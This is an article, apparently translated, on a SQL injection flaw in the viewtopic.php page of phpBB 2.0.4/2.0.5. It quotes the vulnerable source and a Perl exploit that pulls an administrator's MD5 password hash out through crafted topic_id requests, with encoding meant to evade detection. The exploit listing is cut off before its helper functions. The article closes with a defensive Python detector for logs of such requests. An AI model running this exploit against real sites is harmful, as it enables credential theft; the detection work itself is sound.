Alright, let's analyse why the vulnerability arises. Take the viewtopic.php page: when viewtopic.php is called, "topic_id" is taken straight from the GET request and handed to the SQL query without any filtering, so an attacker can submit a specially crafted SQL string to obtain the MD5 password hash, and that hash can then be used for automatic login or for brute-force cracking. (I doubt anyone would actually want to brute-force it, unless they had a very important reason.) First, let's look at the relevant source code:
Quoted fragment:

```php
if (isset($HTTP_GET_VARS[POST_TOPIC_URL]))
{
    $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
}
elseif (isset($HTTP_GET_VARS['topic']))
{
    $topic_id = intval($HTTP_GET_VARS['topic']);
}
```

From the above we can see that when view=newest is submitted and sid has a value, the query that gets executed looks like the one below (if you have not yet read the phpBB source code, I suggest reading it and following along with it here; affected systems: phpBB 2.0.5 and phpBB 2.0.4).
Quoted fragment:

```php
$sql = "SELECT p.post_id
    FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u
    WHERE s.session_id = '$session_id'
        AND u.user_id = s.session_user_id
        AND p.topic_id = $topic_id
        AND p.post_time >= u.user_lastvisit
    ORDER BY p.post_time ASC
    LIMIT 1";
```
Rick provided the following test code:

```perl
use IO::Socket;

$remote     = shift || 'localhost';
$view_topic = shift || '/phpBB2/viewtopic.php';
$uid        = shift || 2;
$port       = 80;
$dBType     = 'mysql4';   # mysql4 or pgsql

print "Trying to get password hash for uid $uid server $remote dbtype: $dBType\n";

# One request per hash character: each response leaks one byte of the MD5 hash
$p = "";
for ($index = 1; $index <= 32; $index++) {
    $socket = IO::Socket::INET->new(PeerAddr => $remote,
                                    PeerPort => $port,
                                    Proto    => "tcp",
                                    Type     => SOCK_STREAM)
        or die "Couldnt connect to $remote:$port : $@\n";

    $str = "GET $view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql())
         . "&view=newest" . " HTTP/1.0\n";
    print $socket $str;
    print $socket "Cookie: phpBB2mysql_sid=1\n";   # replace this for pgsql or remove it
    print $socket "Host: $remote\n\n";

    while ($answer = <$socket>) {
        if ($answer =~ /location:.*\x23(\d+)/)   # Matches the location: viewtopic.php?p=
        {
            $p .= chr($1);
        }
    }
    close($socket);
}

print "\nMD5 Hash for uid $uid is $p\n";

# random encode str. helps avoid detection
sub random_encode
# (the listing ends here in the source; the bodies of random_encode and make_dbsql are not shown)
```
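Because the test program percent-encodes its payload precisely to slip past naive pattern matching, a log-side check for this bug has to decode the query string first and then ask whether topic_id is still a plain integer, the only shape the quoted query ever expects. The Python detector below is an added example, not code from the page or from Rick; the access-log lines are constructed (Apache common format, SQL payload bodies replaced by "..."), and it assumes phpBB2's POST_TOPIC_URL parameter name is "t".

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (Apache common format), not taken from the page;
# SQL payload bodies are replaced by "...". Line 4 percent-encodes letters at
# random, the way the test program's random_encode() is described as doing.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jul/2003:12:00:01 +0000] "GET /phpBB2/viewtopic.php?t=42 HTTP/1.0" 200 5120
10.0.0.5 - - [10/Jul/2003:12:00:02 +0000] "GET /phpBB2/viewtopic.php?topic_id=17&view=newest HTTP/1.0" 302 0
10.0.0.9 - - [10/Jul/2003:12:00:03 +0000] "GET /phpBB2/viewtopic.php?topic_id=-1%20UNION%20SELECT%20... HTTP/1.0" 302 0
10.0.0.9 - - [10/Jul/2003:12:00:04 +0000] "GET /phpBB2/viewtopic.php?sid=1&topic_id=-1%20%55n%49%4fn%20%53elect%20...&view=newest HTTP/1.0" 302 0
10.0.0.7 - - [10/Jul/2003:12:00:05 +0000] "GET /index.php HTTP/1.0" 200 3000
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/\d\.\d"')
INT_RE = re.compile(r"^-?\d+$")  # the only shape a topic id should ever have
# Names viewtopic.php reads the topic id from; POST_TOPIC_URL is 't' in phpBB2 (assumption).
TOPIC_PARAMS = ("topic_id", "t", "topic")

def inspect(line):
    """Return a finding for one log line, or None if the request looks benign."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/viewtopic.php"):
        return None
    # parse_qs percent-decodes once (as the server does before PHP), normalising payloads
    qs = parse_qs(parts.query, keep_blank_values=True)
    for name in TOPIC_PARAMS:
        for value in qs.get(name, []):
            if not INT_RE.match(value.strip()):
                newest = qs.get("view", [""])[0] == "newest"
                # sid plus view=newest is exactly the path on which the quoted query runs
                severity = "high" if newest and "sid" in qs else "medium"
                return f"{severity}: non-integer {name}={value!r} view=newest={newest}"
    return None

def scan(log_text):
    """Apply inspect() to every line; return (line_number, finding) pairs."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        f = inspect(line)
        if f:
            findings.append((n, f))
    return findings

if __name__ == "__main__":
    for n, f in scan(SAMPLE_LOG):
        print(f"line {n}: {f}")
```

Running it over the sample flags lines 3 and 4 only; the legitimate view=newest request on line 2 passes because its topic_id decodes to a bare integer.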